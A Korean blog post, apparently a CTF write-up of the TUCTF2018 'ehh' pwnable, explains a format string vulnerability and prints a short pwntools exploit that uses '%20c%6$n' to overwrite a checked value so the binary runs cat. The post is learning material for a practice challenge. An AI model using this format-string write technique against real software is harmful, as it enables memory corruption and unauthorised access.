본문 바로가기
[ ★ ]Study/CTF

TUCTF2018 - ehh

by nroses-taek 2018. 12. 15.
반응형

FSB 취약점을 가지는 pwnable problem


[nroses@localhost Ehh]$ ./ehh 

>Input interesting text here< 0x56625028


AAAA %x %x %x %x %x %x


AAAA ffc03808 18 0 0 56625000 41414141



우선 프로그램 흐름은 GDB를 통해 아래와 같이 알 수 있다.


1. >Input interesting text here< [ Value ] 을 출력한다.


2. read를 통해서 0x18 만큼 입력을 받는다. 


3. printf( 입력 받은 것 ) 을 실행.


1번에서의 Value 값이 cmp 비교로 0x18이 되어야 /bin/cat/ 실행이 가능하다.



위에서와 깉이 AAAA 입력받고 6번째에서 입력값이 출력되는 것을 알 수 있다.


from pwn import *


#r = process("./ehh")

#r = remote("18.222.213.102", 12345)


print r.recvuntil(">Input interesting text here< ")

addr = int(r.recvline(), 16)


data = p32(addr)

data += "%20c%6$n"   # 0x18 - addr(4)


r.sendline(data)

r.interactive()

반응형

'[ ★ ]Study > CTF' 카테고리의 다른 글

Pwntools 설치(install)  (0) 2019.04.03
X-MAS 2018 Greetings from Santa  (0) 2019.01.01
TUCTF2018 Shella_Easy(pwn)  (0) 2018.12.15
P.W.N CTF ImportantService(pwn)  (0) 2018.12.01
RITSEC2018 ezpwn  (0) 2018.11.19

댓글